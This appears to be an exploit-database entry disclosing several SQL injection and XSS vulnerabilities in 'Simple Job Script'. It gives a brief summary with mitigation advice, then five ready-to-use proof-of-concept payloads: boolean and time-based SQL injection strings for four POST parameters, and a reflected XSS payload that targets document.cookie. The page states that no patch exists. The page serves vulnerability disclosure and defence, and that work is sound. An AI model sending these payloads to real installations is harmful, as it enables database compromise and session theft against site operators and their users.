header-logo
Suggest Exploit
vendor:
Simple Job Script
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection, XSS
89, 79
CWE
Product Name: Simple Job Script
Affected Version From: Latest
Affected Version To: Latest
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2019

Simple Job Script – Multiple Vulnerabilities

Multiple vulnerabilities exist in Simple Job Script. These include SQL injection vulnerabilities in the 'landing_location', 'job_id', 'employerid', and 'app_id' parameters, as well as an XSS vulnerability in the 'job_type_value[]' parameter.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection. Additionally, input validation and output encoding should be implemented to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: Simple Job Script - Multiple Vulnerabilities
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://simplejobscript.com/
# Download Link:
https://github.com/niteosoft/simplejobscript/archive/master.zip
# Demo Site: https://demo.simplejobscript.com
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/searched
Vulnerable Parameter: landing_location (POST)
Payload:
landing_location=-1%20OR%203*2*1=6%20AND%20000405=000405%20--%20&landing_title=test



----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/get_job_applications_ajax.php
Vulnerable Parameter: job_id (POST)
Payload: job_id=-1%20OR%203*2*1=6%20AND%20000615=000615%20--%20


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/register-recruiters
Vulnerable Parameter: employerid (POST)
Payload: if(now()=sysdate(),sleep(0),0)


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/delete_application_ajax.php
Vulnerable Parameter: app_id (POST)
Payload:
app_id=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/


----- PoC 5: XSS -----

Request:
http://localhost/[PATH]/jobs?_=1&job_type_value[]=Full%20time&srch_location_val[]=fulltime_ctype
Vulnerable Parameter: job_type_value[] (GET)
Payload: "><svg+onload%3Dalert(document.cookie)>

Navigation

Suggest Exploit

Services By CQR